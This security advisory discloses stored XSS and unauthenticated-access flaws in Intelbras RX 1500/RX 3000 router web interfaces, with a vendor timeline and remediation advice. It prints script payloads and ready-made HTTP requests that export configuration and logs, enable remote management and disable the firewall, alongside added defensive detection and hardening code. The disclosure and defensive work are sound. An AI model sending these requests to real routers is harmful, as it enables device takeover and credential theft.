📄 Intelbras RX 1500 2.2.9 / RX 3000 1.0.11 IDOR / XSS

21 Jul 2025. Reported by Gabriel Lima. Type: packetstorm. Source: packetstorm.news. 169 views.

Intelbras RX 1500 and RX 3000 web interfaces expose admin tokens and configurations via XSS and unauthenticated access.

    =====[Tempest Security Intelligence]==========================================
    
    Multiple vulnerabilities in the web management interface of Intelbras
    routers
    
    Author: Gabriel Lima <gabriel lima () tempest com br >
    
    =====[Table of Contents]======================================================
    
    1. Overview
    2. Detailed description
    3. Other contexts & solutions
    4. Acknowledgements
    5. Timeline
    6. References
    
    =====[1. Overview]============================================================
    
    * Systems affected:
    
      Intelbras web interface RX 1500 - 2.2.9 (verified; other routers/versions may be affected)
    
      Intelbras web interface RX 3000 - 1.0.11 (verified; other routers/versions may be affected)
    
    * Release date: 07/14/2025
    
    * Impact: Several vulnerabilities were found providing retrieval of
    administrative session tokens and direct unauthenticated access to
    sensitive features that allow the recovery of current router configuration.
    
    The RX 1500 [1] and RX 3000 [2] are Wi-Fi 6 routers, which the vendor
    positions as delivering more speed, better network efficiency and less
    interference, aimed at high-speed residential plans and high-performance
    connections.
    
    =====[2. Detailed description]================================================
    
    The web management system for the RX 1500 and RX 3000 routers is designed
    to help the device's administrator configure the device to suit their
    needs. However, during security research, multiple vulnerabilities related
    to XSS and direct unauthenticated access were identified.
    
    As a result of performing this research, two types of vulnerabilities were
    found: Cross-Site Scripting (XSS) vulnerabilities and Direct
    Unauthenticated Access vulnerabilities.
    
    To illustrate the impact of the XSS vulnerabilities: an unauthenticated
    attacker may gain administrative access to the system and full control of
    the router, while an attacker who already has administrator access can use
    them to establish persistence and maintain that access.
    
    Regarding the direct unauthenticated access vulnerabilities, the
    application hosts endpoints that allow the retrieval of log files and of
    the router's configuration file, which stores the device's password and
    its current settings. An important point is that any feature can be
    accessed without authentication, as long as an administrator is
    authenticated and active within the system at that moment.
    
    The following section dissects the XSS issues.
    
    2.1 Possibility of injecting JavaScript code into client names (XSS) -
    CVE-2025-26064
    
    An authenticated threat actor may inject persistent JavaScript through the
    connected clients configuration feature (Home > Connected clients). The
    problem occurs because special characters in the "Name" field are not
    handled.
    
    As proof of concept, the following payload was used:
    
    &lt;script&gt;alert(1)&lt;/script&gt;
    
    Payload used in plain text:
    
    <script>alert(1)</script>
    
    The following request pinpoints the insertion of the payload:
    
    [snippet]
    POST /HNAP1/ HTTP/1.1
    Host: 10.0.0.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://purenetworks.com/HNAP1/SetClientInfo"
    X-Requested-With: XMLHttpRequest
    Content-Length: 596
    Cookie: uid=COOKIE-HERE
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetClientInfo xmlns="http://purenetworks.com/HNAP1/"><ClientInfoLists><ClientInfo><MacAddress>Client-MacAddress</MacAddress><NickName>PAYLOAD-IN-HTML-ENCODE</NickName><ReserveIP></ReserveIP><secRouter></secRouter><Type>WIFI_5G</Type><COMMAND>change</COMMAND></ClientInfo></ClientInfoLists><COMMAND></COMMAND></SetClientInfo></soap:Body></soap:Envelope>
    [/snippet]
    
    After this request is submitted, the payload is rendered and executed in
    the context of the victim's browser.
    
    2.2 Possibility of injecting JavaScript code into the name of the visiting
    network (XSS) - CVE-2025-26064
    
    An authenticated threat actor may inject persistent JavaScript through the
    Guest Network functionality (Settings > Wi-Fi > Guest Network). The
    problem occurs because special characters in the "Wi-Fi network name"
    field are not handled (for both the 2.4GHz and 5GHz networks).
    
    As a proof of concept, the following payloads were HTML encoded and
    inserted into each field:
    
    2.4GHz network: &lt;script&gt;alert(1)&lt;/script&gt;
    
    5GHz network: &lt;script&gt;alert(2)&lt;/script&gt;
    
    Payloads used in plain text:
    
    2.4GHz network: <script>alert(1)</script>
    
    5GHz network: <script>alert(2)</script>
    
    The following portrays an example of the request submitted by the attacker:
    
    [snippet]
    POST /HNAP1/ HTTP/1.1
    Host: 10.0.0.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions"
    X-Requested-With: XMLHttpRequest
    Content-Length: 2991
    Cookie: uid=COOKIE-HERE
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions xmlns="http://purenetworks.com/HNAP1/"><SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11bgn</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-2.4GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11anac</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-5GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40/80</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName></ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetGuestZoneRouterSettings xmlns="http://purenetworks.com/HNAP1/"><InternetAccessOnly>false</InternetAccessOnly><IPAddress></IPAddress><SubnetMask></SubnetMask><DHCPServer>true</DHCPServer><DHCPRangeStart></DHCPRangeStart><DHCPRangeEnd></DHCPRangeEnd><DHCPLeaseTime>0</DHCPLeaseTime></SetGuestZoneRouterSettings></SetMultipleActions></soap:Body></soap:Envelope>
    [/snippet]
    
    By accessing the system's home page (namely: the Status page), one can
    observe the JavaScript rendering for both fields.
    
    2.3 Possibility of multiple JavaScript code injections in the Site Survey
    feature (XSS) - CVE-2025-26063
    
    The "Site Survey" feature (Management > Site Survey) displays nearby active
    Wi-Fi networks, presenting their ESSIDs among other details. Because
    special characters are not handled, whenever an attacker creates a rogue
    Wi-Fi network whose name contains HTML/JavaScript code (e.g.
    "<script>alert(1)</script>") and the router administrator uses this
    feature, the malicious code is executed as soon as the tab listing all
    available ESSIDs is opened.
    
    As a proof of concept, an SSID with the following name was created:
    
    <script>alert(1)</script>
    
    The following is an example of the request made by the administrator upon
    starting a "Site Survey" scan:
    
    [snippet]
    POST /HNAP1/ HTTP/1.1
    Host: [redacted]
    SOAPAction: "http://purenetworks.com/HNAP1/igd_wifi_list_scan_start"
    X-Requested-With: XMLHttpRequest
    Content-Length: 357
    Cookie: [redacted]
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><igd_wifi_list_scan_start xmlns="http://purenetworks.com/HNAP1/"><radio>2.4g</radio></igd_wifi_list_scan_start></soap:Body></soap:Envelope>
    [/snippet]
    
    The XSS is triggered by hovering the mouse pointer over the network's name
    (highlighted in the graphic shown within the router's web management
    interface) or by opening the nearby devices section.
    
    The following section dissects the direct unauthenticated access issues.
    
    2.4 Incorrect Access Control - CVE-2025-26062
    
    This section addresses three access control vulnerabilities that MITRE
    considered duplicates of one another. For clarity, they are treated here
    as a single topic.
    
    2.4.1 Possibility of retrieving router logs
    
    The router's administrative interface provides a feature (Management >
    System log) that allows an authenticated entity (e.g. an administrator)
    to retrieve the router's log file, which may contain potentially sensitive
    debug information. However, because permissions are not validated, an
    unauthenticated entity can download the file without going through the
    authentication procedure.
    
    The following is an example request used as proof of concept:
    
    [snippet]
    POST /cgi-bin/dllog.cgi HTTP/1.1
    Host: 10.0.0.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 13
    
    Export=Export
    [/snippet]
    
    As a result, a log file containing potentially sensitive information is
    provided for download.
    
    
    2.4.2 Possibility of recovering backups of router settings
    
    The router's administrative interface provides a feature (Management >
    System) that allows an authenticated entity (e.g. an administrator) to
    retrieve the router's current configuration file, which may contain
    potentially sensitive information about the environment. However, because
    permissions are not validated, an unauthenticated entity can download the
    file without going through the authentication procedure.
    
    The following snippet illustrates the request made by an unauthenticated
    attacker to the affected endpoint to retrieve the router's configuration
    file; part of the contents of the ".cfg" file is returned in the response:
    
    [snippet]
    POST /cgi-bin/ExportSettings.sh HTTP/1.1
    Host: 10.0.0.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 13
    
    Export=Export
    [/snippet]
    
    As a result of submitting this request, the .cfg backup file is retrieved
    without any authorization being required.
    
    2.4.3 Possibility of accessing various functionalities in an
    unauthenticated manner
    
    Various router features, such as editing firewall rules, configuring Wi-Fi
    settings, and changing the router's security rules and policies, were
    found to be accessible without authentication whenever an administrator
    was concurrently logged in to the router's administrative interface at
    the moment of exploitation.
    
    In other words, the only precondition for this unauthenticated access is
    that an administrator is logged in at the moment of exploitation.
    
    The following snippet shows a request that makes the router's
    administrative interface publicly accessible (i.e. reachable from the
    Internet):
    
    [snippet]
    POST /HNAP1/ HTTP/1.1
    Host: 10.0.0.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://purenetworks.com/HNAP1/SetAdministrationSettings"
    X-Requested-With: XMLHttpRequest
    Content-Length: 491
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetAdministrationSettings xmlns="http://purenetworks.com/HNAP1/"><HTTPS>false</HTTPS><RemoteMgt>true</RemoteMgt><RemoteMgtPort>8080</RemoteMgtPort><RemoteMgtHTTPS>false</RemoteMgtHTTPS><InboundFilter></InboundFilter></SetAdministrationSettings></soap:Body></soap:Envelope>
    [/snippet]
    
    The following snippet shows a request that disables the router's Denial of
    Service (DoS) protection:
    
    [snippet]
    POST /HNAP1/ HTTP/1.1
    Host: 10.0.0.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://purenetworks.com/HNAP1/SetFirewallEnableSettings"
    X-Requested-With: XMLHttpRequest
    Content-Length: 381
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetFirewallEnableSettings xmlns="http://purenetworks.com/HNAP1/"><Firewall_Enabled>false</Firewall_Enabled></SetFirewallEnableSettings></soap:Body></soap:Envelope>
    [/snippet]
    
    Other features are accessible in an unauthenticated manner, as long as the
    request is sent when the administrator is active.
    
    Taken together, the findings in this section make various attack vectors
    for administrative access feasible from the perspective of an
    unauthenticated user. Furthermore, once authenticated as an administrator,
    an attacker would be able to establish persistence using the same
    approaches.
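
The requests in this section share two recognisable traits: privileged CGI paths or HNAP "Set*" actions sent without the device's `uid` session cookie, and HNAP bodies carrying script markup. The following triage routine is an added example written for this page, not code from the advisory or from Intelbras; it parses raw HTTP requests (as a defender would collect them from a proxy log or span port in front of the router) and reports those traits. The endpoint paths and SOAPAction names are the ones quoted above; the sample requests are constructed for the example, and the "privileged" sets are illustrative rather than a complete inventory of the device's calls.

```python
"""Constructed triage helper (added example, not the advisory's code).

Parses raw HTTP requests captured in front of the router and flags the two
patterns described in section 2.4 (privileged endpoints and HNAP actions
called without a session cookie) plus HNAP bodies carrying script markup
(sections 2.1 and 2.2). Endpoint paths and SOAPAction names come from the
advisory; the sample requests are made up for this example.
"""
import re

# Endpoints and actions the advisory reports as reachable without a session.
# Illustrative, not a complete inventory of the device's privileged calls.
PRIVILEGED_CGI = {"/cgi-bin/dllog.cgi", "/cgi-bin/ExportSettings.sh"}
PRIVILEGED_ACTIONS = {
    "SetAdministrationSettings", "SetFirewallEnableSettings",
    "SetClientInfo", "SetMultipleActions",
}
# SOAPAction looks like "http://purenetworks.com/HNAP1/SetClientInfo" (quoted).
ACTION_RE = re.compile(r'HNAP1/([A-Za-z0-9_]+)"?$')


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def triage(raw: str) -> list:
    """Return human-readable findings for one request (empty list if clean)."""
    req = parse_request(raw)
    findings = []
    # The device's session cookie is named "uid" in the advisory's requests.
    has_session = "uid=" in req["headers"].get("cookie", "")
    if req["path"] in PRIVILEGED_CGI and not has_session:
        findings.append(f"unauthenticated export via {req['path']}")
    if req["path"] == "/HNAP1/":
        m = ACTION_RE.search(req["headers"].get("soapaction", ""))
        action = m.group(1) if m else "unknown"
        if action in PRIVILEGED_ACTIONS and not has_session:
            findings.append(f"unauthenticated HNAP action {action}")
        body = req["body"].lower()
        # The advisory's payloads were sent HTML-encoded, so check both forms.
        if "<script" in body or "&lt;script" in body:
            findings.append(f"script markup in HNAP body for {action}")
    return findings


def _hnap(action: str, body_xml: str, cookie: str = "") -> str:
    """Build a constructed HNAP request in the shape shown in the advisory."""
    headers = [
        "POST /HNAP1/ HTTP/1.1",
        "Host: 10.0.0.1",
        "Content-Type: text/xml; charset=utf-8",
        f'SOAPAction: "http://purenetworks.com/HNAP1/{action}"',
    ]
    if cookie:
        headers.append(f"Cookie: {cookie}")
    envelope = ('<?xml version="1.0" encoding="utf-8"?><soap:Envelope><soap:Body>'
                f'<{action} xmlns="http://purenetworks.com/HNAP1/">{body_xml}'
                f'</{action}></soap:Body></soap:Envelope>')
    return "\r\n".join(headers) + "\r\n\r\n" + envelope


# Constructed samples mirroring the advisory's requests.
EXPORT_REQ = ("POST /cgi-bin/ExportSettings.sh HTTP/1.1\r\nHost: 10.0.0.1\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n\r\nExport=Export")
REMOTE_MGT_REQ = _hnap("SetAdministrationSettings",
                       "<RemoteMgt>true</RemoteMgt><RemoteMgtPort>8080</RemoteMgtPort>")
CLIENT_NAME_REQ = _hnap("SetClientInfo",
                        "<ClientInfo><NickName>&lt;script&gt;alert(1)&lt;/script&gt;"
                        "</NickName></ClientInfo>", cookie="uid=COOKIE-HERE")
BENIGN_REQ = _hnap("SetClientInfo",
                   "<ClientInfo><NickName>Living room TV</NickName></ClientInfo>",
                   cookie="uid=COOKIE-HERE")

if __name__ == "__main__":
    for name, raw in [("export", EXPORT_REQ), ("remote-mgmt", REMOTE_MGT_REQ),
                      ("client-name", CLIENT_NAME_REQ), ("benign", BENIGN_REQ)]:
        print(name, triage(raw))
```

A request without a cookie to one of the export CGIs, or a cookie-less HNAP "Set*" call, is exactly what a normal browser session never produces, so both findings are high-signal; the script-markup check is noisier and is best used to triage what an administrator saved, since the payload is stored HTML-encoded and only becomes dangerous when the UI decodes it.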
    
    =====[3. Other contexts & solutions]==========================================
    
    For the disclosed XSS issues, it is recommended that all information
    coming from third parties (databases, other applications, the client
    side, etc.) have its special characters converted to **HTML entities**
    before being rendered. In addition, the data must be semantically
    filtered to guarantee that it conforms to the expected format and is free
    of undesired characters.
    
    In regard to the unauthenticated access disclosed issues, it is strongly
    recommended that changes be made to the application's existing session
    management and access control, such that access to sensitive
    functionalities is available only to authenticated users, and that these
    users perform only actions permitted by their authorization profile.
    
    Moreover, it is important to highlight that all logic that determines
    whether a user has the necessary permissions to perform a certain action
    must execute **exclusively on the server-side**.
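
As an added illustration of these two recommendations (this is example code written for this page, not Intelbras firmware and not part of the advisory), the block below puts a weak authorization gate next to a hardened one and adds an output encoder plus a semantic filter for SSID and client-name fields. The endpoint paths are the ones the advisory names; treating the whole of /HNAP1/ as privileged and modelling the weak gate as a device-wide "an administrator is logged in" flag are assumptions made to reproduce the reported symptom, not a description of how the firmware actually works.

```python
"""Added example (not Intelbras' firmware nor the advisory's code): the two
fixes section 3 recommends, reduced to a per-request authorization gate and
an output encoder. The paths are the advisory's; the session model of the
"weak" gate is an assumption chosen to illustrate the reported symptom (any
request succeeds while an administrator is logged in).
"""
import html
import re
import secrets
from dataclasses import dataclass, field

# Paths that must never answer without a valid session (from the advisory;
# treating all of /HNAP1/ as privileged is an assumption).
SENSITIVE_PATHS = {"/cgi-bin/dllog.cgi", "/cgi-bin/ExportSettings.sh", "/HNAP1/"}


@dataclass
class Request:
    path: str
    cookies: dict = field(default_factory=dict)


class WeakGate:
    """Device-wide flag: once anyone has logged in, every caller is trusted.
    Reproduces the behaviour reported in section 2.4.3 (assumed cause)."""

    def __init__(self):
        self.admin_active = False

    def login(self) -> str:
        self.admin_active = True
        return "not-checked"

    def allow(self, req: Request) -> bool:
        return req.path not in SENSITIVE_PATHS or self.admin_active


class HardenedGate:
    """Server-side check on every request: the caller must present a session
    id this server issued. Nothing the client asserts about itself is trusted."""

    def __init__(self):
        self.sessions = set()

    def login(self) -> str:
        sid = secrets.token_urlsafe(32)  # unguessable, issued per login
        self.sessions.add(sid)
        return sid

    def logout(self, sid: str) -> None:
        self.sessions.discard(sid)

    def allow(self, req: Request) -> bool:
        if req.path not in SENSITIVE_PATHS:
            return True
        return req.cookies.get("uid") in self.sessions


def encode_for_html(value: str) -> str:
    """Output encoding for client names and SSIDs before they reach the page:
    & < > " ' become entities, so <script>alert(1)</script> is displayed
    rather than executed."""
    return html.escape(value, quote=True)


# Semantic filter for an SSID field: printable ASCII, 1-32 characters
# (802.11 allows up to 32 octets), and none of the HTML-significant chars.
SSID_RE = re.compile(r"^[\x20-\x7e]{1,32}$")


def ssid_is_acceptable(ssid: str) -> bool:
    return bool(SSID_RE.match(ssid)) and not any(c in ssid for c in "<>\"'&")


if __name__ == "__main__":
    gate = HardenedGate()
    sid = gate.login()
    print(gate.allow(Request("/cgi-bin/ExportSettings.sh")))               # False
    print(gate.allow(Request("/cgi-bin/ExportSettings.sh", {"uid": sid})))  # True
    print(encode_for_html("<script>alert(1)</script>"))
```

The point of the contrast is that the hardened gate keys the decision on a secret the server issued to that caller, checked on every request, whereas the weak gate keys it on global state that an unrelated caller can ride on. Encoding and filtering are applied at different points: the filter rejects clearly malformed input when it is saved, the encoder protects the page regardless of what was saved, and neither replaces the other.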
    
    =====[4. Acknowledgements]====================================================
    
    - Joaquim Brasil de Oliveira < joaquim brasil () tempest com br >
    
    - Tempest Security Intelligence[3]
    
    =====[5. Timeline]============================================================
    
    07/15/2024 - We contacted the manufacturer reporting an XSS vulnerability
    in the Site Survey functionality;
    
    07/16/2024 - The vendor requested contact information;
    
    07/17/2024 - Contact information was sent to the vendor;
    
    07/17/2024 - The vendor began the process of validating and acknowledging
    the first bug reported;
    
    07/22/2024 - A full report was sent with all the other discovered
    vulnerabilities;
    
    07/25/2024 - The vendor acknowledged all the vulnerabilities reported in
    the RX 1500 and RX 3000 devices;
    
    09/19/2024 - The vendor released the beta version of the corrected
    firmware, 2.2.12;
    
    09/23/2024 - All points were retested and confirmed fixed;
    
    01/27/2025 - CVE IDs requested from MITRE;
    
    02/24/2025 - MITRE issued the CVE IDs;
    
    07/14/2025 - Publication date.
    
    =====[6. References]==========================================================
    
    [1] https://www.intelbras.com/pt-br/roteador-wi-fi-6-dual-band-rx-1500
    
    [2] http://intelbras.com/pt-br/roteador-wireless-rx-3000
    
    [3] https://tempest.com.br
    


Scores as of 21 Jul 2025: Vulners AI Score 6.8 (medium risk); CVSS 3.1 base score 9.8; EPSS 0.01156; SSVC not provided; 169 views.